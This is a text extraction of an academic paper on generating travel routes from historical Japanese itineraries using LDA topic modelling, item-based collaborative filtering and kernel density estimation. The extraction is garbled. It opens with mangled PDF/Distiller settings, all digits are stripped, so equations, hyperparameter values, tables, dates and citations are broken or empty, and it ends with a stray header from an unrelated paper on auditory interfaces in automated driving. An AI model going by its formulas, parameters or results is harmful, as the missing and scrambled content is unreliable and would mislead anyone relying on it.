f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice international journal of advanced network, monitoring and controls volume , no. , traveling route generation algorithm based on lda and collaborative filtering peng cui, yuming wang and chunmei li* department of computer technology and applications qinghai university xining, china, e-mail: li_chm @sina.com abstract—with the rapid development of china’s economy and the increase in tourism consumption, the number of people in traveling in domestic tourism has increased rapidly each year, and more travelers choose privately customized travel routes, so reasonable travel route is generated based on the actual users’ needs has become a hot research spot in the current industry and academia. however, as far as practical application is concerned, the planning of travel routes is a comprehensive and complex task. reasonable travel routes include comprehensive features such as reasonable travel cities, travel time, transportation methods, and itinerary arrangements. at present, the traditional method is basically that the customer manager can manually plan the suitable travel route for the user through collecting the user's needs, and then modify and adjust by communicating with the customer. the problem that this brings is that the customer manager needs to compare information such as users’ needs, travel price, travel time, travel transportation, and scenic spot arrangements when planning numerous travel routes. obviously, the traditional methods have significant disadvantages such as low efficiency and long time-consuming. bring a great burden to the staff and it is incompatible with the development of the current industry. in order to solve the above problems, we put the historical travel routes collected as data sets in the paper, and a travel route recommendation and generation algorithm based on lda and collaborative filtering is designed. reasonable city recommendation list and playing time are the basis and focus of route planning. the paper is based on the many shortcomings in the traditional travel route planning method, and takes the city's recommendation and time planning as the main focuses on work. in this work, different recommendation algorithms were designed, including a recommendation algorithm based on latent dirichlet allocation (lda) and collaborative filtering. by analyzing the performance of the recommendation algorithm on the data sets, the recommendation algorithm is improved and optimized. the lda algorithm based on kde (kernel density estimation) and classification, the collaborative filtering algorithm based on kde and classification. the final experimental results show that the optimal city list and travel time generated by the recommended algorithm are more reasonable and satisfy the actual use of the user. keywords-lda model; collaborative filtering; kde algorithm; recommended algorithm; machine learning i. introduction tourism industry has become an important part of national economy within the rapid development of china's national economy in these years, and the number of travelers has also been gradually increasing. according to the data shown by national bureau of statistics, the consumption brought by tourism has also increased year by year. the tourism industry has shown an accelerated convergence of online and offline. traditional travel agencies have been unable to meet consumers’ need and development of modern tourism. based on the above situation, the online development mode of tourism has become a research hotspot in academia and industry. at present, the development carrier of online tourism is mainly online travel websites doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , (such as: tuniu.com, tongcheng.com, etc.). the traditional travel website was designed by b/s mode [ ], which can provide consumers with a large amount of tourist information, however, the travel route displayed on the website is manually planned by sales account manager after collecting users’ requirements. therefore, this has created two problems. on the one hand, the traditional method of artificially planning travel routes has low productivity and cannot meet the development of tourism. so how to automatically generate a reasonable travel route with intelligent algorithms according to users’ needs has become an urgent problem to be solved. on the other hand, traditional travel routes can no longer meet the individual needs of each user, so how to reduce the blindness and randomness of route arrangement, then provide customers with personalized travel routes, thus providing more travel options for users to choose has gradually become a research hotspot of relevant enterprises and disciplines. in recent years, algorithms for travel route generation, lda, and collaborative filtering have been reported many times. ma zhangbao et al. [ ], who began with the space decision-making of tourism travel, studied methods and techniques of the tourism travel decision support system, and then proposed the operational model of travel combining space and time and the lbs model of tourism travel route. however, the model proposed in their paper focuses on querying attractions and hotels based on space, time and location service, and then provide users with query service of the optimal destination as well as the scheme to arrive at destination. but this way can not generate a complete travel route according to the user's demand; it was not suitable for applying in the actual context. jin baohui et al. [ ] designed a travel route choice model based on regret theory and figured out the deficiency of expect utility theory and prospect theory via comparison, and then proposed a simpler travel route choice model. this paper focuses on description of tourists’ behavior in selecting routes, and then presents a selection model for tourists under uncertain conditions. it didn’t do comprehensive comparison and sorting for travel routes, even didn’t discuss about actual problems. also, travel information provided by online travel sites, which provides big data source, were totally ignored in their work. chunjing xiao, et al. has proposed a travel route recommendation method based on dynamic clustering. this method firstly analyzes different characteristics of tourism data and other standard data. secondly, it uses the variable long time window obtained by dynamic clustering to divide the tourist interaction history. the potential dirichlet distribution (lda) is used to extract probability topic distribution of each stage, and the user interest drift model is established by combining the time penalty weights. finally, the route recommendation is completed according to the candidate topic and probability topic relevance of tourists [ ]. although this method has good recommendation accuracy, it focuses on recommending possible routes for users under the premise of there are some user interest sets and numerous travel routes, at the same time, it does not focus on the study of travel route generation. wang hui et al. has proposed the solution of ant colony algorithm in the application of travel route planning, they discussed the application in vehicle routing problem based on ant colony algorithm and completed the travel of a scenic spots in the country that using the shortest time. however, this paper does not study the planning and generation of travel routes that meet needs according to user's preference conditions [ ]. hou le [ ] et al. has proposed an optimization algorithm based on iterated local search (ils) and cuckoo search (cs). this algorithm firstly uses ils to solve tourist attractions and initial travel routes. then, the cs algorithm is used to minimize time cost of travel route while satisfying both the time window constraint of tourist attraction and the total number of attractions. the main problem solved by the algorithm is a complete route of the shortest travel time required given the tourist attractions. the research focuses on minimizing the time of travel routes; in the meanwhile, it has not completed research from city list generation to the development of route plan. research and application of recommendation algorithms such as collaborative filtering and lda (latent dirichlet allocation) are reported at home and abroad. yajun l [ ] and others wrote a review of collaborative filtering recommendation techniques. in this paper,what they have international journal of advanced network, monitoring and controls volume , no. , done were summarized and compared the collaborative filtering algorithms. this paper reviews the related research of collaborative filtering. firstly, it expounds the connotation of collaborative filtering and its main situation, including sparsity, multi-content and scalability, and then detail the solutions for domestic and foreign scholars. this article is very helpful for the study and research of collaborative filtering algorithms. qiang c, et al. has proposed a recommendation algorithm based on label and collaborative filtering. the label is used as information embodying user interest preferences and resource characteristics. the user and resource tag feature vectors are generated based on the multi-dimensional relationship between users, tags and resources. finally, based on prediction preferences, sorting values will produces top-n recommendations. then the collaborative filtering algorithm is applied to the recommendation of personalized resources [ ]. one of the most successful applications of collaborative filtering algorithms in foreign countries is the amazon online website. amazon's g linden [ ] and others proposed an item-based collaborative filtering algorithm, which is well suited for comparing similar items rather than comparing similar users. the number of items is much larger than the actual number of users, resulting in high quality recommendations. regarding the lda algorithm, dm blei et al. [ ] proposed a three-level hierarchical bayesian model in , and proposed an efficient approximate reasoning technique based on variational method and an em algorithm for empirical bayesian parameter estimation. the lda algorithm was successfully applied to the fields of text modeling, text categorization, topic extraction, etc., and mixed with unigrams and probabilistic lsi models. r krestel et al. [ ] successfully applied the lda algorithm to the field of tag recommendation. they used the lda algorithm to mine the user tags under the same theme, and then recommended the new tags to the user as a search condition, which improved the search efficiency. from the current research status at home and abroad, there is no relevant scholars and enterprises can provide a feasible and accurate method to meet actual requirements. the current research results focus on the recommended method of designing travel routes under the premise of mastering user information and historical route data, which is, recommending the travel route in historical routes through user's historical information, so for the new user's demand, it can't generate a new route that meets the user's needs. at the same time, through the learning and researching for collaborative filtering and lda algorithm, it is found that these algorithms are feasible and applied in this paper. according to that, we will show the method of recommendation and generation of tourist routes based on lda and collaborative filtering below. ii. related work the planning of a travel route is a complex and comprehensive process that requires consideration of many factors, such as user’s demand, the price of route, interest arrangement, and transportation. the basic theory of route planning and generation involves multiple disciplines, including data mining, statistical machine learning, network search, pattern recognition, and spatial data mining. a scientific travel route can display as many tourist attractions and landscapes as possible to visitors, thereby improving satisfaction and happiness of tourists and promoting the long-term development of tourism industry. in recent years, with the rapid development of artificial intelligence technology, route planning algorithms such as genetic algorithm, particle swarm optimization algorithm, simulated annealing algorithm, ant colony algorithm and immune algorithm have been emerged. the planning and generation of a travel route mainly involves generating recommended city according to user's needs, and reasonably planning the playing time of recommended city. this paper takes the collected historical travel route datasets of japan as researching object, mainly studies the recommendation and generation scheme of travel city time-space list in the travel route planning. it is proposed to use lda and collaborative filtering to design the travel city recommendation algorithm, using kde algorithm to optimize the playing time of each city, and then generate a time-space list of user's playing city. in the experimental part, the results of topic city model based lda and different international journal of advanced network, monitoring and controls volume , no. , travel route recommendation algorithms are introduced in detail. the relevant city error rate of topic city model based lda under different parameters is compared and the optimal model parameters are obtained. finally, the performance of different recommendation algorithms is evaluated and analyzed. iii. travel route recommendation and generation system the travel route recommendation algorithm based on kde and classification mainly includes three modules. they are data preprocessing and feature extraction module, playing time estimation module based on kde, topic city generation module based on lda and travel route generation module or recommended city generation module based on collaborative filtering. the data preprocessing and feature extraction module mainly transforms the original data set into a travel route text set through operations such as data cleaning, classification and feature extraction, that is, it conforms to the input format of lda model, such as the document-content distribution format. the original data set comes from the travel historical data set of japan, and there are about , travel routes. the playing time estimation module based on kde mainly uses the kde algorithm to calculate users’ total playing time and the playing time of input cities, improving the accuracy of the playing time and the quality of recommended algorithm. the topic city generation module based on lda is the core module of entire algorithm. in this module, the topic-probability distribution under the travel route text and the characteristic city probability distribution under each topic are calculated through established travel city topic model based on lda. in turn, the probability distribution of characteristic cities is converted into a list of recommended cities. the topic city generation module based on collaborative filtering is also the core module of entire algorithm. in this module, the list of recommended cities satisfying conditions is calculated through the collaborative filtering algorithm. the travel route generation module is the total output module of algorithm. after processing the output result of previous module, a complete travel route is finally formed, including users’ total playing time, the list of travel cities, and the list of playing time of each city. the system structure of algorithm is shown in figure and figure . figure . lda travel route recommendation algorithm based on kde and classification international journal of advanced network, monitoring and controls volume , no. , figure . collaborative filtering travel route recommendation algorithm based on kde and classification a. data preprocessing and feature extraction module data preprocessing is basis for algorithm to get good training and output results. in the data cleaning and preprocessing module, feature extraction and data classification are mainly completed. the given original data set is mainly json format travel route data. each route is an ordered list of multiple city lists. the attributes of each city list include the city id (id), trip name or city name (name), type, travel time (travel_times or transit_time). data cleaning is used to extract useful feature data in the data set and complete the missing data. then the extracted data is sorted according to specific rules, where we classify according to the number of cities of route. finally, through data preprocessing, the data is organized into a data set that can be used as the lda model input, such as a document-content distribution format. the specific data preprocessing steps are: ) reading the json data file using python code, the city name (name), travel time (travel_times), and route number (plan_id) of each route are read; ) calculating the number of writing for each city, the specific number of writing = the total playing time (hour) / ; ) writing the extracted features into different output files according to a specific format ([number of lines, route id, city name]); ) according to the number of cities in each route, the output will be classified according to the number of cities , - , - , - , , and stored in the corresponding files; ) the writing of data is completed and the file is saved. preprocessed and classified data playing time recommended city data preprocessing and feature extraction raw data datar aw datad ata 数据 playing time estimatio n based on kde topic city generatio n based on lda travel route generation international journal of advanced network, monitoring and controls volume , no. , table i. route basic attribute table id name plan_id type hours daysep meaning city id city name route id route type playing time the flag of end of day value type string string string string list bool example ‘ ’ ‘osaka’ ‘ ’ ‘place’ [ . , . ] true b. playing time estimation module based on kde in general, the total time for users to play is calculated based on people's experience theoretics to formulate specific rules, for example, total hours of playing (days) = total time of playing(days) * playing time of every day ( hours). the playing time of city that the user wants to go to is calculated by multiplying the probability of topic distribution obtained by lda by the total playing time. in practical applications, it is found that this method does not have a certain degree of flexibility and cannot adapt to all user inputs. the resulting time error is relatively large, resulting in poor recommendation quality. therefore, in this paper, we decided to use the kde (kernel density estimation) algorithm to estimate total time for users to play and the playing time of city that users want to go to, improving the recommendation quality. assuming that t , t , … tn are n samples of total playing time t, and the probability density function of total playing time is ( )f t , the kernel density estimation of ( )f t is: ˆ ( ) ( )              n n i h n i i i t t f t k t t k n nh h  where h is the bandwidth, n is the number of samples, and k () is the kernel function. the algorithm steps for playing time estimation based on kde are: ) according to the number of days of playing, the historical routes will be categorized into five categories: - days, - days, - days, - days and days or more; ) determining the corresponding route data category according to the number of days of playing input by users; ) reading the playing time of each route of a specific category, and saving it as a list a; ) using list a as the input data of kernel density estimation function to obtain the kernel density estimation function; ) randomly sample a function value as the total time for user to play, expressed as h, according to the obtained kernel density function; ) repeat the above steps to obtain the list of playing time g of input cities. according to the above algorithm, we can get total time for user to play, expressed as h and the list of playing time for input cities. these two values will be used later in the topic city generation module based on lda. c. topic city generation module based on lda the lda model is a probabilistic topic model for modeling discrete data sets (such as document sets). lda is essentially an unsupervised machine learning model that can express high-dimensional text word space as low-dimensional topic space, ignoring text-related category information. the lda model gets a brief description of document by making topic modeling of document set, retaining the essential statistical information and helping to efficiently process large-scale document sets [ ]. in general, before applying lda model, it is necessary to satisfy the premise that the document is composed of a number of latent topics, which are composed of a number of specific words in the text, ignoring the order of words and syntactic structure in the document. for the travel route dataset of this paper, after data preprocessing and feature extraction, a document set containing discrete city names is formed. each document is composed of a number of travel cities. there is no syntactic structure in the document, and words are not specific order. and it is in accordance with premise and data requirements of lda model. in this paper, according to international journal of advanced network, monitoring and controls volume , no. , preprocessed travel route datasets, the training set of travel routes is characterized by dimensionality reduction, and the training set is expressed as the form of topic probability, so that a specific topic city is extracted from the topic probability list to form a recommendation city list. figure . travel city topic model based on lda figure above shows the established travel city topic model based on lda. there are three layers in the model, followed by the document collection layer of travel city, topic layer, and characteristic city layer. the process of travel city topic model based on lda generates a feature city as follows: ) for topic c, a word polynomial distribution vector φ on the topic is obtained based on dirichlet distribution dir (β); ) the number of words n obtained from the poisson distribution p; ) according to the dirichlet distribution dir (α), a topic distribution probability vector θ of the text is obtained; ) for each word wn in the text n words: a) polynomial distribution from θ multinomial (θ) randomly selects a topic z; b) select a word as w n from the polynomial conditional probability distribution multinomial(φ) of topic z. to obtain the probability distribution of a characteristic city, we need to use model parameter estimation methods to estimate word probability distribution under each topic and topic probability distribution of each text. the more commonly used parameter estimation methods are the expected propagation algorithm, variational bayesian inference and gibbs sampling [ ] [ ]. the high-efficiency gibbs sampling method is used in this paper estimates the probability distribution of a characteristic city through the gibbs sampling method in the case of a known travel route data text set. according to lda model, we can get the probability of a text: ( | , ) ( ) | )( ( | ) ( | , )) n n n n n zn p p p z p z d             using the gibbs sampling method, the topic of each word is sampled, and the parameter estimation problem can be converted into calculating the conditional probability of topic sequence under word sequence. , , , , , , ( , ) ( | , ) ( ) ( , ) t k i t t i i k i kv ti k i t t np z p z k z n p z n                       international journal of advanced network, monitoring and controls volume , no. , in the above expression, i z represents the topic variable corresponding to the i-th word;   i z is the i-th word is not included in the expression; t k n is the number of occurrences of the word t in the topic k is represented;  t is the prior probability of dirichlet of the word t; and k m n represents the number of topic k in the text m.  k is the prior probability of dirichlet of topic k. based on the above calculation results and the topic number of each word obtained, parameters to be calculated can be calculated by the following equation: , t k t k t v t k t t n n         , k m k m k k k m k k n n          k , t represents the probability of word t in the topic k; ,  m k represents the probability of topic k in the text m. the input and output of travel city topic model based on lda is shown in the following table : table ii. input and output of travel city topic model based on lda input:preprocessed and classified travel route text set (one route for one line) the number of topic k, hyperparameters α and β output: . topic number assigned to each word of each text . topic probability distribution θ for each text . characteristic city probability distribution for each topic . word id mapping table in the program .top-n feature city words sorted from top to bottom for each topic d. travel city generation module based on collaborative filtering because there are a large number of travel routes in the data set of this research, we can regard each travel route as a user before applying the collaborative filtering recommendation algorithm and consider each travel city in each route as a item. obviously the number of items in this research is much larger than the number of users, so we use a project-based collaborative filtering recommendation algorithm. the algorithm of a travel city generation module based on collaborative filtering is divided into the following three steps: ) establish a route-city scoring dictionary. according to the actual situation, the score here is playing time (hours) of each city. based on the pre-processed travel route text set, a route-city scoring dictionary was established. the key value of dictionary is the route number, value is also a dictionary, the key is the city name, and value is playing time of city. the format is as follows: dic={‘route ’:{‘city- ’: playing time- ,‘city- ’: playtime- ,…,‘city-n’: playtime-n},‘route ’:{‘city- ’: playtime- ,‘city- ’: playing time- ,…,‘city-n’:playing time-n},…, ‘route-n’:{‘city- ’: playtime- ,‘city- ’: playing time- ,…,‘city-n’: playing time-n}} ) calculating the similarity between cities and getting a list of similar cities (neighbors) in each city. in calculating similarity, we use the euclidean distance to measure the similarity between cities; ) generateing a list of recommended cities. a weighted sum of all the cities in the set of city neighborhoods is obtained, and the time for the target route to all cities is international journal of advanced network, monitoring and controls volume , no. , finally obtained. after playing time set is sorted, the top-n list is taken as city recommendation list. e. travel route generation module the travel route generation module is an integrated module and an output module of the entire algorithm. through playing time estimation module based on kde, the total time for users to play h and the playing time list g for input cities can be obtained.the topic city generation module based on the lda can be used to get the probabilistic distribution of characteristic city—recommended cities list. we need to normalize the probability of extracted topical city, find out playing time of recommended city based on processed probability value, and finally form a complete travel route. the main process of travel route generation module is as follows: a. rest ← h – sum(g) #calculating total playing time of recommended cities list b. sum_prop ← #assigning the total probability value = c. recom_list=get_recom() #getting a list of recommended cities , the form: [[city- , probability value- ],[city ,probability value- ],…] d. trip_list ← null #assigning the route list to null e. for i← to size(recommended city list size) do sum_prop←sum_prop+ recom_list [i][ ] repeat f. for i← to size(recommended city list size) do recom_list [i][ ]←recom_list [i][ ]/sum_prop * rest repeat g. for i← to size(recommended city list size) do trip_list [i]←recom_list [i] repeat h. add the list of cities entered by the user and their playing time to trip_list i. return trip_list through the travel route generation module, you can get a complete travel route. the specific route format is [[city- , playing time- ], [city- , playing time- ]… [city-n, playing time-n]]. iv. the result and analysis of experiment the evaluation of experimental results is an important work, this chapter mainly shows and evaluates the experimental results of different recommended algorithms, including the results of the topic city generation based on lda, the results of the lda travel route recommendation algorithm based on kde and classification, the results of the collaborative filtering travel route recommendation algorithm based on kde and classification, the performance of different travel route recommendation and generation algorithms based on lda and the relevant city error rate are compared under different parameters. in recommendation field, commonly used evaluation indicators include recall rate and precision rate [ ][ ]. generally, the accuracy of the recommended algorithm is evaluated by the recall rate and precision rate. in e-commerce systems, the conceptual formulas for recall rate and precision rate are as follows [ ]: precision rate = the number of items user likes / the number of items recommended by the system; recall rate = the number of all user's favorite items in the recommended list / the number of all user's favorite items in the system based on the concept and calculation methods of precision rate and recall rate, combined with the research content of this paper, we propose two evaluation indicators of the relevant city error rate and route correlation rate, which are used to evaluate the results of topic city generation model based lda and route generation results of recommendation algorithm respectively. in popular terms, the relevant city error rate is the probability that a tourist city is classified as a wrong topic (route). here we use p (e) to represent, which can be calculated by the following formula: ( )  i i c p e a  in the above formula, ci represents the number of tourist cities that are classified as the wrong topic in the probability distribution of the i-th topic, that is, in the historical routes, the city is not in the same route as any other city in the topic city. ai represents the total number of cities in the international journal of advanced network, monitoring and controls volume , no. , probability distribution of the i-th topic. therefore, the lower the relevant city error rate, the higher the quality of the model output, the more easily accepted. in the practical application, the related city error rate is generally not more than . . according to the relevant city error rate above, we can get the route correlation rate calculation method. here, we use r (t) to represent: ( )   i i t r t t  in the above formula, i t represents the number of recommended cities that are classified as wrong routes in the i-th generation route, that is, in the historical routes, the city is not in the same route as any other city in the generation route. i t represents the total number of cities in the i-th generation route. because in the recommendation process, if there are cities that have no relevance with other cities in the recommended route, it is often unacceptable. therefore, the higher the route correlation rate, the better the performance of the route recommendation and generation algorithm, the more consistent with the user's expectations. in practical applications, the route correlation rate is generally not less than %. a. the evaluation of topic city generation model based lda the value of topic k of lda model, the number of iterations, and the hyperparameters α and β all affect the probability distribution of the final topic city. therefore, in order to obtain the optimal topic city probability distribution, we examine the effect of probability distribution of the topic city under different parameters. in order to ensure the uniformity of the experimental premises, the sample set of all the experimental results below is a set of - tourist route texts. ) experimental results under different hyperparameter α we set the initial value of topic k = , the number of iterations: niter = , the hyperparameter β = . , then the hyperparameter α takes , , , until . table and figure below show the experimental results for different values of hyperparameter α. from the experimental results, it can be seen that the value of the optimal hyperparameter α is . table iii. the experimental results of different values of hyperparameter Α log . . . . . . . . . . p(e) . . . . . . . . . . figure . the experimental results of different values of hyperparameter α international journal of advanced network, monitoring and controls volume , no. , ) experimental results under different hyperparameter β we set the initial number of topic k = , the number of iterations: niter = , the hyperparameter α = , then the hyperparameter β takes . , . , . , until . . table and figure below show the experimental results for different values of hyperparameter β. from the experimental results, it can be seen that the value of the optimal hyperparameter β is . . table iv. the experimental results of different values of hyperparameter Β . . . . . . . . . . log . . . . . . . . . . p(e) . . . . . . . . . . figure . the experimental results of different values of hyperparameter β ) experimental results under different number of topic k we set the number of iterations: niter = , the hyperparameter α = , . , then the value of topic k takes , , , until . table and figure below show the experimental results for different number of topic k. from the experimental results, it can be seen that the optimal number of k is . table v. the experimental results of different number of topic k k log . . . . . . . . . . p(e) . . . . . . . . . . international journal of advanced network, monitoring and controls volume , no. , figure . the experimental results of different number of topic k ) experimental results under different number of iterations n we set the initial number of topic k = , the hyperparameter α = , . , then the number of iterations take , , , until . table and figure below show the experimental results for different number of iterations n. from the experimental results, it can be seen that the optimal number of iterations is . table vi. the experimental results of different number of iterations n n log . . . . . . . . . . p(e) . . . . . . . . . . figure . the experimental results of different number of iterations n from the above experimental results, it can be concluded that the optimal parameters of topic city generation model based lda are k= , hyperparameter α= , β= . , and the number of iterations n= . under the optimal parameters, the relevant city error rate is . , which is an acceptable error rate in practical applications. international journal of advanced network, monitoring and controls volume , no. , b. evaluation of lda travel route recommendation algorithm based on kde and classification in order to reduce contingency of experimental results and improve confidence of experimental results, in the experiment evaluation of this section, we carry out the following experimental steps: ) randomly generating groups of input city list and playing time; ) using the random generated input city list and playing time as input to the recommendation algorithm ) recording the output of algorithm obtained from sets of input data, and taking the average value of relevant city error rate of sets of experiments, denoted as ei ) repeating the above steps ( )-( ) for times to obtain the value of ei for each time. figure . the route correlation rate of lda travel route recommendation algorithm based on kde and classification figure shows the experimental results obtained in independent experiments. it can be seen from the figure that the value of route correlation rate has been stable at around %, because the topic city generation model based lda has a certain degree of randomness in generating the recommended city list, there will be irrelevant cities in the resulting travel routes. however, by observing experimental results, the route correlation rate of generated travel routes is about %, which is within the normal error range. therefore, the performance of lda travel route recommendation algorithm based on kde and classification is relatively good, which conform to practical applications. c. evaluation of collaborative filtering travel route recommendation algorithm based on kde and classification in order to reduce the contingency of experimental results and improve the confidence of experimental results, in the experimental evaluation of this section, we also carry out following experimental steps: ) randomly generating groups of input city list and playing time; ) using the randomly generated input city list and playing time as input to the recommendation algorithm ) recording the output of algorithm obtained from sets of input data, and taking the average value of relevant city error rate of sets of experiments, denoted as ei ) repeating the above steps ( )-( ) for times to obtain the value of ei for each time. international journal of advanced network, monitoring and controls volume , no. , figure . the route correlation rate of collaborative filtering travel route recommendation algorithm based on kde and classification figure shows the experimental results obtained in independent experiments. it can be seen from the figure that the value of the route correlation rate has been stable at around %, compared with experimental results of lda travel route recommendation algorithm based on kde and classification. the correlation rate obtained by collaborative filtering algorithm is higher, but the difference is not large. this is because the core of collaborative filtering algorithm is based on traditional statistical algorithms, and there is no randomness. the route correlation rate with an error rate of approximately % is due to the irrelevance of user s’ input city list.. because in the actual application, cities list input by the user may not exist in the historical routes itself, which is due to systematic error caused by the incompleteness of historical data, which may not be considered in our experiments. d. comparison of algorithm output results table vii. the output results of different algorithm the input of algorithm total days of travel cities that user wants to go osaka, nagoya the output of algorithm no improved lda recommended algorithm [naoshima: . , yamanashi: . , osaka: . , nagoya: . ] no improved collaborative filtering recommendation algorithm [yakushima: . , naoshima: . , osaka: . , nagoya: . ] lda travel route recommendation algorithm based on kde and classification [kyoto: . , nakafurano-cho: . , osaka: . , nagoya: . ] collaborative filtering travel route recommendation algorithm based on kde and classification [kyoto: . , tokyo: . , osaka: . , nagoya: . ] table above is results of travel route generation under different recommendation algorithms. it can be seen from experimental results that the improved travel route recommendation algorithm is significantly better than the no-improved algorithm in the playing time schedule. the playing time is more reasonable than previous algorithm. the situation that playing time is too short has reduced, reaching our expected goal. international journal of advanced network, monitoring and controls volume , no. , e. summary of experimental results in order to evaluate model results and recommended algorithms, this chapter first proposed new evaluation indicator based on recall rate and precision rate realization principles, relevant city error rate and route correlation rate. then, the influences of different number of topic k, number of iterations, the hyperparameters α and β on the lda topic city generation model are introduced. after many experiments, the optimal model parameters are determined to be k= , α= , β = . , niter = . finally, the performance of different recommendation algorithms is evaluated. it can be seen from experimental results that collaborative filtering travel route recommendation algorithm based kde and classification is slightly higher than the route correlation rate of lda travel route recommendation algorithm based kde and classification by about %. in the actual application process, different recommendation algorithms can be selected according to users’ actual demand. the final experimental results show that the optimization effect of proposed algorithm by using the classification method and kde algorithm is obvious. the lda and collaborative filtering algorithm optimized by classification method improves the route correlation rate and makes the route correlation rate indicator reach more than %. the kde algorithm is used to optimize playing time, which makes playing time of cities more reasonable, which proves that the method of this paper has great reference value. v. conclusion this paper proposed the travel route recommendation and generation algorithm based on lda and collaborative filtering. the core of algorithm is lda topic model and collaborative filtering. the lda and collaborative filtering travel route recommendation algorithm based on kde and classification are proposed in this paper. although optimized algorithm designed has achieved good performance, but it still needs a lot of work to be done, including: ) the recommendation algorithm based on lda topic model has a certain degree of randomness in generating the recommended city list, there will be not related to the historical routes in resulting travel routes, but within the acceptable error rate. the output of recommendation algorithm based on collaborative filtering is relatively fixed and does not generate new feasible routes. and although the collaborative filtering algorithm does not have randomness problems, due to the irrelevance of user s’ input city list, a certain error rate will also occur. therefore, we can study a method that can combine the lda topic model and collaborative filtering algorithm to make the performance of the recommendation algorithm better. ) so far, the hyperparameters of lda model, such as the number of topic k, α and β, are mainly adjusted manually by empirical rules, resulting in a huge amount of experimental work. later, we can consider some methods of adding reinforcement learning and self-game, and propose a method that can learn the optimal parameters. this is also a research hotspot in the field of machine learning in recent years. ) further studying the evaluation method of travel route, because the evaluation of travel route has certain subjectivity, so this brings certain difficulties to actual assessment. at present, only quantifiable indicators can be extracted to evaluate part reasonability of travel route. so evaluation indicators may not be comprehensive. later, we can study and propose a comprehensive and reasonable evaluation method of travel route. acknowledgements this paper is partially supported by qinghai university student science and technology innovation fund project (no. -qx- ); reference [ ] wohlin c, runeson p, höst m, et al. experimentation in software engineering [j]. ieee transactions on software engineering, , se- ( ): - . [ ] mabao z, research on methods and techniques of tourism travel decision support system [d]., shandong university of science and technology. - [ ] baohui jin. travel route choice model based on regret theory. computer modelling & new technologies ( ) - [ ] changing x, kewen x, yongwei q, et al. tourist route recommendation based on dynamic clustering [j]. journal of computer applications, , ( ): - . international journal of advanced network, monitoring and controls volume , no. , [ ] hui w, changhua l, yuling w ,et al. application of ant colony optimization in tourism route planning [j]. software guide, , ( ): - . [ ] hou l, yang h, fan y, et al. research on personalized trip itinerary based on ils-cs optimization [j]. journal of frontiers of computer science & technology, , ( ): - . [ ] yajun li ,qing lu, changyong liang .review of collaborative filtering[j].pattern re-cognition and artificial intelligence, , ( ): - . [ ] qiang c, dongmei h , haisheng l ,et al . personalized resource recommendations based on tags and collaborative filtering [j].computer science, , ( ): - . [ ] linden g, smith b, york j. amazon.com recommendations: item-to-item collaborative filtering [j]. ieee internet computing, , ( ): - . [ ] blei d m, ng a y, jordan m i. latent dirichlet allocation [j]. journal of machine learning research, , : - . [ ] krestel r, fankhauser p, nejdl w. latent dirichlet allocation for tag recommendation[c].acm conference on recommender systems, recsys , new york, ny, usa, october. dblp, : - . [ ] epanechnikov v a. non-parametric estimation of a multivariate probability density [j]. theory of probability & its applications, , ( ): - . [ ] friedman n, dan g, goldszmidt m. bayesian network classifiers [j]. machine learning, , ( - ): - . [ ] heinrich g. parameter estimation for text analysis[j]. technical report, . [ ] billsus d, pazzani m j. learning collaborative information filters.[c]//proceedings of the th national conference on artificial intelligence (aaai ). san francisco: aaai press, : - . [ ] basu c, hirsh h, and cohen w. recommendation as classification: using social and content-based information in recommendation[c]//proceedings of the th national conference on artificial intelligence. san francisco: aaai press, : - . [ ] yang s h, long b, smola a j, et al. collaborative competitive filtering:learning recommender using context of user choice[c]// international acm sigir conference on research and development in information retrieval. acm, : - . [ ] george g, haas m r, pentland a. big data and management: from the editors [j]. academy of management journal, , ( ): - . auditory interfaces in automated driving: an international survey submitted may accepted july published august corresponding author pavlo bazilinskyy, p.bazilinskyy@tudelft.nl academic editor 